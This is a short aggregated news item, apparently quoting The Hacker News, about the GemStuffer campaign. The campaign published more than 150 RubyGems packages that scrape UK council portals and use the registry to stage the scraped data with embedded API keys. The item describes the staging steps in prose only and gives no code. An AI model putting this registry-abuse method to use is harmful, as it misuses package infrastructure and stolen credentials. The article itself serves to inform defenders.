""The packages do not appear designed for mass developer compromise," Socket said. "Many have little or no download activity, and the payloads are repetitive, noisy, and unusually self-contained.""
""Instead, the scripts fetch pages from U.K. local government democratic services portals, package the collected responses into valid .gem archives, and publish those gems back to RubyGems using hardcoded API keys.""
"At a high level, the campaign abuses RubyGems as a place to stage the scraped council content. It does this by fetching hard-coded U.K. council portal URLs, packaging the HTTP responses into valid .gem archives, and publishing those archives to RubyGems using embedded registry credentials."
"In some cases, the payload embedded within the gem creates a temporary RubyGems credential environment under "/tmp," overrides the HOME environment variant, builds a gem locally, and pushes it to RubyGems using the gem command-line interface (CLI), as opposed to depending on pre-existing RubyGems credentials on the target machine."
GemStuffer targets the RubyGems repository with more than 150 gems that use the registry for data exfiltration rather than mass developer compromise. The gems fetch pages from UK local government democratic services portals, package the collected HTTP responses into valid .gem archives, and publish those archives back to RubyGems using embedded API credentials. Some payloads create a temporary RubyGems credential environment under /tmp, override HOME, build the gem locally, and push it via the gem CLI. Other variants upload the archive directly to the RubyGems API using an HTTP POST request. After publication, attackers can retrieve the stored data by running gem fetch for the gem name and version.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]